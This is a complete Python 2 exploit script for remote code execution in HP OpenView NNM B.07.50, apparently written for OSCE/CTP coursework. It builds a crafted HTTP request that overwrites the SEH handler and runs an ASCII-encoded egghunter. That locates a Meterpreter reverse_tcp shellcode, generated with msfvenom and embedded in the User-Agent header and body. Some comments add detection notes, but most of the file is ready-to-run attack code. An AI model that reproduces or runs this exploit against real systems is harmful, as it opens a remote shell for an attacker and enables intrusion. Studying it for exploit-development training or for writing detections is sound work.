HP OpenView NNM B.07.50 Remote Code Execution exploit with an ASCII-encoded egghunter, the JO/JNO jump-over-SEH trick and stack alignment. Written during the OSCE/CTP course.
#!/usr/bin/python | |
# HP OpenView NNM B.07.50 Remote Code Execution exploit | |
# by Mariusz B. / mgeeky, 17' | |
import struct | |
import socket | |
# Target of the crafted HTTP request: HOST is a placeholder to be filled in by
# the operator, PORT is the TCP port main() connects to.
HOST, PORT = '192.168.XXX.YYY', 7510
def exploit(conn):
    """Build the crafted HTTP request and send it once over *conn*.

    conn: a connected socket.socket. main() passes the socket object itself
    (socket.connect() returns None, so the value it assigns to `conn` there
    is never used).

    Request layout, as assembled from the literals below:
      Host header       3377 x 'A' + 4-byte jump stub + 4-byte return
                        address + stage2 (32 x 'G', the encoded egghunter,
                        100 x 'G', ':7510')
      User-Agent header the alphanumeric shellcode string (720 chars) plus
                        500 bytes of 0xCC
      body              the 8-byte tag 'T00WT00W' followed by the same
                        shellcode again

    Python 2 syntax (print statements, str used as a byte buffer); it does
    not run unchanged under Python 3.

    Detection notes (all visible in the request itself): a Host header of
    several KB made mostly of a single repeated byte, a User-Agent header
    that is hundreds of alphanumeric characters followed by 0xCC bytes, a
    request body starting with 'T00WT00W', and a Content-Length (1048580)
    that does not match the ~1.2 KB actually sent.
    """
    #
    # Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler:
    #
    # 0x6d213d2b : pop esi # pop ebp # ret
    # | asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False
    # Packed little-endian; the module it points into is stated in the comment above.
    return_address = 0x6d213d2b
    ret = struct.pack('<I', return_address)
    # 3381 is the offset at which the Host header value reaches the SEH record;
    # the 4 subtracted bytes are occupied by stage1 (the next-SEH slot).
    junk = 'A' * (3381 - 4)
    #
    # Stage 1: Jump over handler's address
    # 71 08 JNO short $+8
    # 70 06 JO short $+6
    stage1 = '\x71\x08\x70\x06'
    stage2 = 'G' * 32
    # This is an windows 32-byte long egghunter
    # encoded with my custom ASCII encoder
    # Which can be located in this gist:
    # https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
    # Raw strings: the backslashes are literal characters of the encoded payload.
    egghunter = r"%JMNU%521*TX-A777-i%"
    egghunter += r"%%-r2II-\ZZZP\%JMNU%"
    egghunter += r"521*-gNlN-zG1G-yQ1Q-"
    egghunter += r"1111P-cj10-v777-uX4X"
    egghunter += r"-xwxxP-NNNN-s1*z-J*r"
    egghunter += r"x-ttttP-5S%w-0n4v-nn"
    egghunter += r"nn-nnnnP-jj7j-vj%n-i"
    egghunter += r"t3y-jjjjP-d%ud-n1rf-"
    egghunter += r"7%tI-1111P-4Rfx-*5\v"
    egghunter += r"-92\y-\\\\P-p222-v2v"
    egghunter += r"v-O6wV-t%hkP"
    stage2 += egghunter
    stage2 += 'G' * 100
    # NOTE(review): the ':7510' suffix is not explained here; it matches PORT,
    # presumably so the Host value still parses as host:port — confirm.
    stage2 += ':7510'
    # Full Host header value: padding, jump stub, SEH handler address, egghunter.
    exp = junk + stage1 + ret + stage2
    # Tag the egghunter searches memory for; it prefixes the shellcode in the body.
    egg = 'T00WT00W'
    shellcode = ''
    #
    # Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter
    # at the end takes a long jump to the value of EDI register, which is a base for the shellcode.
    #
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \
    # BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d'
    # Payload size: 720 bytes
    #
    # 18 lines x 40 characters = the 720 bytes stated above.
    shellcode += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0"
    shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0"
    shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL"
    shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL"
    shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t"
    shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M"
    shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt"
    shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22"
    shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo"
    shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h"
    shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx"
    shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP"
    shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB"
    shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v"
    shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH"
    shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o"
    shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo"
    shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA"
    # 500 bytes of 0xCC (the x86 int3 opcode) appended after the shellcode.
    shellcode += "\xcc" * 500
    # The same shellcode string is placed both in the User-Agent header and,
    # after the egg tag, in the body.
    buf = 'GET /topology/homeBaseView HTTP/1.1\r\n'
    buf += 'Host: ' + exp + '\r\n'
    buf += 'Content-Type: application/x-www-form-urlencoded\r\n'
    buf += 'User-Agent: ' + shellcode + '\r\n'
    # Declared length is far larger than the body actually written below.
    buf += 'Content-Length: 1048580\r\n\r\n'
    buf += egg + shellcode
    print '[+] Sending HTTP packet of %d length...' % len(buf)
    print '\tHost header len: %d' % len(exp)
    print '\tEgghunter len: %d' % len(stage2)
    print '\tShellcode len: %d' % len(shellcode)
    print '[?] Wait about 7-15 seconds until exploit kicks in.'
    # Single send(); the number of bytes actually transmitted is not checked.
    conn.send(buf)
def main():
    """Entry point: connect to HOST:PORT and hand the socket to exploit().

    Python 2 syntax. Known rough edges visible below: the bare `except:` also
    swallows KeyboardInterrupt and SystemExit; the socket is not closed when
    the connect fails; and `conn` receives None (socket.connect() returns
    None) and is never used -- the socket object itself is passed on.
    """
    print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit'
    print '[*] by Mariusz B. / mgeeky, 17'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print '[.] Connecting with %s:%d...' % (HOST, PORT)
        # connect() returns None; this assignment is dead.
        conn = sock.connect((HOST, PORT))
        print '[+] Connected.'
    except:  # NOTE: bare except -- catches everything, not just socket errors
        print '[!] Could not connect.'
        return None
    exploit(sock)
    sock.close()
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()